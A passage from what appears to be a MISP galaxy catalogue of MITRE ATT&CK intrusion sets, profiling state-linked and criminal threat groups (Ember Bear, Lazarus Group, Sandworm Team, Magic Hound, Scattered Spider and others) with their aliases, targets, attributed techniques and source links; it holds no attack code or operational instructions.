[Ember Bear](https://attack.mitre.org/groups/G1003) is a suspected Russian state-sponsored cyber espionage group that has been active since at least March 2021. [Ember Bear](https://attack.mitre.org/groups/G1003) has primarily focused its operations against Ukraine and Georgia, but has also targeted Western European and North American foreign ministries, pharmaceutical companies, and financial sector organizations. Security researchers assess [Ember Bear](https://attack.mitre.org/groups/G1003) likely conducted the [WhisperGate](https://attack.mitre.org/software/S0689) destructive wiper attacks against Ukraine in early 2022.(Citation: CrowdStrike Ember Bear Profile March 2022)(Citation: Mandiant UNC2589 March 2022)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)

The tag is: misp-galaxy:mitre-intrusion-set="Ember Bear - G1003"

Ember Bear - G1003 is also known as:

  • Ember Bear

  • Saint Bear

  • UNC2589

  • UAC-0056

  • Lorec53

  • Lorec Bear

  • Bleeding Bear

Table 7011. Table References

Links

https://attack.mitre.org/groups/G1003

https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/

https://www.crowdstrike.com/blog/who-is-ember-bear/

https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation

Dust Storm - G0031

[Dust Storm](https://attack.mitre.org/groups/G0031) is a threat group that has targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. (Citation: Cylance Dust Storm)

The tag is: misp-galaxy:mitre-intrusion-set="Dust Storm - G0031"

Dust Storm - G0031 is also known as:

  • Dust Storm

Dust Storm - G0031 has relationships with:

  • similar: misp-galaxy:threat-actor="Dust Storm" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7012. Table References

Links

https://attack.mitre.org/groups/G0031

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

Night Dragon - G0014

[Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon)

The tag is: misp-galaxy:mitre-intrusion-set="Night Dragon - G0014"

Night Dragon - G0014 is also known as:

  • Night Dragon

Night Dragon - G0014 has relationships with:

  • similar: misp-galaxy:threat-actor="Night Dragon" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 7013. Table References

Links

https://attack.mitre.org/groups/G0014

https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf

Earth Lusca - G1006

[Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster; however, security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)

The tag is: misp-galaxy:mitre-intrusion-set="Earth Lusca - G1006"

Earth Lusca - G1006 is also known as:

  • Earth Lusca

  • TAG-22

Table 7014. Table References

Links

https://attack.mitre.org/groups/G1006

https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf

Aoqin Dragon - G1007

[Aoqin Dragon](https://attack.mitre.org/groups/G1007) is a suspected Chinese cyber espionage threat group that has been active since at least 2013. [Aoqin Dragon](https://attack.mitre.org/groups/G1007) has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between [Aoqin Dragon](https://attack.mitre.org/groups/G1007) and UNC94, based on malware, infrastructure, and targets.(Citation: SentinelOne Aoqin Dragon June 2022)

The tag is: misp-galaxy:mitre-intrusion-set="Aoqin Dragon - G1007"

Aoqin Dragon - G1007 is also known as:

  • Aoqin Dragon

Table 7015. Table References

Links

https://attack.mitre.org/groups/G1007

https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/

Blue Mockingbird - G0108

[Blue Mockingbird](https://attack.mitre.org/groups/G0108) is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019.(Citation: RedCanary Mockingbird May 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Blue Mockingbird - G0108"

Blue Mockingbird - G0108 is also known as:

  • Blue Mockingbird

Table 7016. Table References

Links

https://attack.mitre.org/groups/G0108

https://redcanary.com/blog/blue-mockingbird-cryptominer/

Tropic Trooper - G0081

[Tropic Trooper](https://attack.mitre.org/groups/G0081) is an unaffiliated threat group that has led targeted campaigns against organizations in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://attack.mitre.org/groups/G0081) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Tropic Trooper - G0081"

Tropic Trooper - G0081 is also known as:

  • Tropic Trooper

  • Pirate Panda

  • KeyBoy

Table 7017. Table References

Links

https://attack.mitre.org/groups/G0081

https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/

https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf

https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

https://www.crowdstrike.com/blog/on-demand-webcast-crowdstrike-experts-on-covid-19-cybersecurity-challenges-and-recommendations/

Moses Staff - G1009

[Moses Staff](https://attack.mitre.org/groups/G1009) is a suspected Iranian threat group that has primarily targeted Israeli companies since at least September 2021. [Moses Staff](https://attack.mitre.org/groups/G1009) openly stated their motivation in attacking Israeli companies is to cause damage by leaking stolen sensitive data and encrypting the victim’s networks without a ransom demand.(Citation: Checkpoint MosesStaff Nov 2021)

Security researchers assess [Moses Staff](https://attack.mitre.org/groups/G1009) is politically motivated, and has targeted government, finance, travel, energy, manufacturing, and utility companies outside of Israel as well, including those in Italy, India, Germany, Chile, Turkey, the UAE, and the US.(Citation: Cybereason StrifeWater Feb 2022)

The tag is: misp-galaxy:mitre-intrusion-set="Moses Staff - G1009"

Moses Staff - G1009 is also known as:

  • Moses Staff

Table 7018. Table References

Links

https://attack.mitre.org/groups/G1009

https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/

https://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations

Lazarus Group - G0032

[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster)

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094).

The tag is: misp-galaxy:mitre-intrusion-set="Lazarus Group - G0032"

Lazarus Group - G0032 is also known as:

  • Lazarus Group

  • Labyrinth Chollima

  • HIDDEN COBRA

  • Guardians of Peace

  • ZINC

  • NICKEL ACADEMY

Lazarus Group - G0032 has relationships with:

  • similar: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077" with estimative-language:likelihood-probability="almost-certain"

Table 7019. Table References

Links

https://attack.mitre.org/groups/G0032

https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/

https://home.treasury.gov/news/press-releases/sm774

https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/

https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing

https://www.us-cert.gov/ncas/alerts/TA17-164A

https://www.us-cert.gov/ncas/analysis-reports/AR19-100A

Putter Panda - G0024

[Putter Panda](https://attack.mitre.org/groups/G0024) is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA’s 3rd General Staff Department (GSD). (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-intrusion-set="Putter Panda - G0024"

Putter Panda - G0024 is also known as:

  • Putter Panda

  • APT2

  • MSUpdater

Putter Panda - G0024 has relationships with:

  • similar: misp-galaxy:threat-actor="APT2" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="3PARA RAT - S0066" with estimative-language:likelihood-probability="almost-certain"

Table 7020. Table References

Links

http://blog.cylance.com/puttering-into-the-future

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://attack.mitre.org/groups/G0024

Scarlet Mimic - G0029

[Scarlet Mimic](https://attack.mitre.org/groups/G0029) is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group’s motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029) and [Putter Panda](https://attack.mitre.org/groups/G0024), it has not been concluded that the groups are the same. (Citation: Scarlet Mimic Jan 2016)

The tag is: misp-galaxy:mitre-intrusion-set="Scarlet Mimic - G0029"

Scarlet Mimic - G0029 is also known as:

  • Scarlet Mimic

Scarlet Mimic - G0029 has relationships with:

  • similar: misp-galaxy:threat-actor="Scarlet Mimic" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="Psylo - S0078" with estimative-language:likelihood-probability="almost-certain"

Table 7021. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

https://attack.mitre.org/groups/G0029

Poseidon Group - G0033

[Poseidon Group](https://attack.mitre.org/groups/G0033) is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the [Poseidon Group](https://attack.mitre.org/groups/G0033) as a security firm. (Citation: Kaspersky Poseidon Group)

The tag is: misp-galaxy:mitre-intrusion-set="Poseidon Group - G0033"

Poseidon Group - G0033 is also known as:

  • Poseidon Group

Poseidon Group - G0033 has relationships with:

  • similar: misp-galaxy:threat-actor="Poseidon Group" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 7022. Table References

Links

https://attack.mitre.org/groups/G0033

https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/

Sandworm Team - G0034

[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia’s General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)

In October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007).(Citation: US District Court Indictment GRU Oct 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Sandworm Team - G0034"

Sandworm Team - G0034 is also known as:

  • Sandworm Team

  • ELECTRUM

  • Telebots

  • IRON VIKING

  • BlackEnergy (Group)

  • Quedagh

  • Voodoo Bear

  • IRIDIUM

Sandworm Team - G0034 has relationships with:

  • similar: misp-galaxy:threat-actor="Sandworm" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="BlackEnergy - S0089" with estimative-language:likelihood-probability="almost-certain"

Table 7023. Table References

Links

https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html

https://attack.mitre.org/groups/G0034

https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/

https://www.dragos.com/resource/electrum/

https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html

https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games

https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/

https://www.justice.gov/opa/page/file/1098481/download

https://www.justice.gov/opa/press-release/file/1328521/download

https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/

https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory

https://www.secureworks.com/research/threat-profiles/iron-viking

Stealth Falcon - G0038

[Stealth Falcon](https://attack.mitre.org/groups/G0038) is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed. (Citation: Citizen Lab Stealth Falcon May 2016)

The tag is: misp-galaxy:mitre-intrusion-set="Stealth Falcon - G0038"

Stealth Falcon - G0038 is also known as:

  • Stealth Falcon

Stealth Falcon - G0038 has relationships with:

  • similar: misp-galaxy:threat-actor="Stealth Falcon" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 7024. Table References

Links

https://attack.mitre.org/groups/G0038

https://citizenlab.org/2016/05/stealth-falcon/

Winnti Group - G0044

[Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting.(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)(Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: 401 TRG Winnti Umbrella May 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Winnti Group - G0044"

Winnti Group - G0044 is also known as:

  • Winnti Group

  • Blackfly

Winnti Group - G0044 has relationships with:

  • similar: misp-galaxy:threat-actor="APT17" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Axiom - G0001" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT17 - G0025" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7025. Table References

Links

http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates

https://401trg.github.io/pages/burning-umbrella.html

https://attack.mitre.org/groups/G0044

https://securelist.com/games-are-over/70991/

https://securelist.com/winnti-more-than-just-a-game/37029/

https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf

Gamaredon Group - G0047

[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word "Armageddon", which was detected in the adversary’s early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022)

In November 2021, the Ukrainian government publicly attributed [Gamaredon Group](https://attack.mitre.org/groups/G0047) to Russia’s Federal Security Service (FSB) Center 18.(Citation: Bleepingcomputer Gamardeon FSB November 2021)(Citation: Microsoft Actinium February 2022)

The tag is: misp-galaxy:mitre-intrusion-set="Gamaredon Group - G0047"

Gamaredon Group - G0047 is also known as:

  • Gamaredon Group

  • IRON TILDEN

  • Primitive Bear

  • ACTINIUM

  • Armageddon

  • Shuckworm

  • DEV-0157

Gamaredon Group - G0047 has relationships with:

  • similar: misp-galaxy:threat-actor="Gamaredon Group" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Scripting - T1064" with estimative-language:likelihood-probability="almost-certain"

Table 7026. Table References

Links

https://attack.mitre.org/groups/G0047

https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/

https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine

https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/

https://www.bleepingcomputer.com/news/security/ukraine-links-members-of-gamaredon-hacker-group-to-russian-fsb/

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

https://www.secureworks.com/research/threat-profiles/iron-tilden

https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/

Charming Kitten - G0058

[Charming Kitten](https://attack.mitre.org/groups/G0058) is an Iranian cyber espionage group that has been active since approximately 2014. They appear to focus on targeting individuals of interest to Iran who work in academic research, human rights, and media, with most victims having been located in Iran, the US, Israel, and the UK. [Charming Kitten](https://attack.mitre.org/groups/G0058) often tries to access private email and Facebook accounts, and sometimes establishes a foothold on victim computers as a secondary objective. The group’s TTPs overlap extensively with another group, [Magic Hound](https://attack.mitre.org/groups/G0059), resulting in reporting that may not distinguish between the two groups' activities.(Citation: ClearSky Charming Kitten Dec 2017)

The tag is: misp-galaxy:mitre-intrusion-set="Charming Kitten - G0058"

Charming Kitten - G0058 is also known as:

  • Charming Kitten

Table 7027. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf

https://attack.mitre.org/groups/G0058

Magic Hound - G0059

[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long-term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021)

The tag is: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059"

Magic Hound - G0059 is also known as:

  • Magic Hound

  • TA453

  • COBALT ILLUSION

  • Charming Kitten

  • ITG18

  • Phosphorus

  • Newscaster

  • APT35

Magic Hound - G0059 has relationships with:

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 7028. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf

https://attack.mitre.org/groups/G0059

https://blog.certfa.com/posts/charming-kitten-christmas-gift/

https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/

https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/

https://noticeofpleadings.com/phosphorus/files/Complaint.pdf

https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/

https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/

https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/

https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf

https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf

https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering

https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf

https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential

https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453

https://www.secureworks.com/research/threat-profiles/cobalt-illusion

Stolen Pencil - G0086

[Stolen Pencil](https://attack.mitre.org/groups/G0086) is a threat group likely originating from DPRK that has been active since at least May 2018. The group appears to have targeted academic institutions, but its motives remain unclear.(Citation: Netscout Stolen Pencil Dec 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Stolen Pencil - G0086"

Stolen Pencil - G0086 is also known as:

  • Stolen Pencil

Table 7029. Table References

Links

https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/

https://attack.mitre.org/groups/G0086

Gorgon Group - G0078

[Gorgon Group](https://attack.mitre.org/groups/G0078) is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. (Citation: Unit 42 Gorgon Group Aug 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Gorgon Group - G0078"

Gorgon Group - G0078 is also known as:

  • Gorgon Group

Table 7030. Table References

Links

https://attack.mitre.org/groups/G0078

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

Bouncing Golf - G0097

[Bouncing Golf](https://attack.mitre.org/groups/G0097) is a cyberespionage campaign targeting Middle Eastern countries.(Citation: Trend Micro Bouncing Golf 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Bouncing Golf - G0097"

Bouncing Golf - G0097 is also known as:

  • Bouncing Golf

Table 7031. Table References

Links

https://attack.mitre.org/groups/G0097

https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/

EXOTIC LILY - G1011

[EXOTIC LILY](https://attack.mitre.org/groups/G1011) is a financially motivated group that has been closely linked with [Wizard Spider](https://attack.mitre.org/groups/G0102) and the deployment of ransomware including [Conti](https://attack.mitre.org/software/S0575) and [Diavol](https://attack.mitre.org/software/S0659). [EXOTIC LILY](https://attack.mitre.org/groups/G1011) may be acting as an initial access broker for other malicious actors, and has targeted a wide range of industries including IT, cybersecurity, and healthcare since at least September 2021.(Citation: Google EXOTIC LILY March 2022)

The tag is: misp-galaxy:mitre-intrusion-set="EXOTIC LILY - G1011"

EXOTIC LILY - G1011 is also known as:

  • EXOTIC LILY

Table 7032. Table References

Links

https://attack.mitre.org/groups/G1011

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

Tonto Team - G0131

[Tonto Team](https://attack.mitre.org/groups/G0131) is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. [Tonto Team](https://attack.mitre.org/groups/G0131) has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).(Citation: Kaspersky CactusPete Aug 2020)(Citation: ESET Exchange Mar 2021)(Citation: FireEye Chinese Espionage October 2019)(Citation: ARS Technica China Hack SK April 2017)(Citation: Trend Micro HeartBeat Campaign January 2013)(Citation: Talos Bisonal 10 Years March 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Tonto Team - G0131"

Tonto Team - G0131 is also known as:

  • Tonto Team

  • Earth Akhlut

  • BRONZE HUNTLEY

  • CactusPete

  • Karma Panda

Table 7033. Table References

Links

https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/

https://attack.mitre.org/groups/G0131

https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html

https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/

https://vb2020.vblocalhost.com/uploads/VB2020-06.pdf

https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.secureworks.com/research/threat-profiles/bronze-huntley

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the-heartbeat-apt-campaign.pdf?

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

GOLD SOUTHFIELD - G0115

[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a-Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high-value deployments. By early 2020, [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) started capitalizing on the new trend of stealing data and further extorting the victim to pay so that their data does not get publicly leaked.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)

The tag is: misp-galaxy:mitre-intrusion-set="GOLD SOUTHFIELD - G0115"

GOLD SOUTHFIELD - G0115 is also known as:

  • GOLD SOUTHFIELD

  • Pinchy Spider

Table 7034. Table References

Links

https://attack.mitre.org/groups/G0115

https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/

https://www.secureworks.com/blog/revil-the-gandcrab-connection

https://www.secureworks.com/research/revil-sodinokibi-ransomware

https://www.secureworks.com/research/threat-profiles/gold-southfield

Scattered Spider - G1015

[Scattered Spider](https://attack.mitre.org/groups/G1015) is a cybercriminal group that has been active since at least 2022, targeting customer relationship management and business-process outsourcing (BPO) firms as well as telecommunications and technology companies. During campaigns, [Scattered Spider](https://attack.mitre.org/groups/G1015) has leveraged targeted social-engineering techniques and attempted to bypass popular endpoint security tools.(Citation: CrowdStrike Scattered Spider Profile)(Citation: CrowdStrike Scattered Spider BYOVD January 2023)(Citation: Crowdstrike TELCO BPO Campaign December 2022)

The tag is: misp-galaxy:mitre-intrusion-set="Scattered Spider - G1015"

Scattered Spider - G1015 is also known as:

  • Scattered Spider

  • Roasted 0ktapus

Table 7035. Table References

Links

https://attack.mitre.org/groups/G1015

https://www.crowdstrike.com/adversaries/scattered-spider/

https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/

https://www.crowdstrike.com/blog/scattered-spider-attempts-to-avoid-detection-with-bring-your-own-vulnerable-driver-tactic/

Operation Wocao - G0116

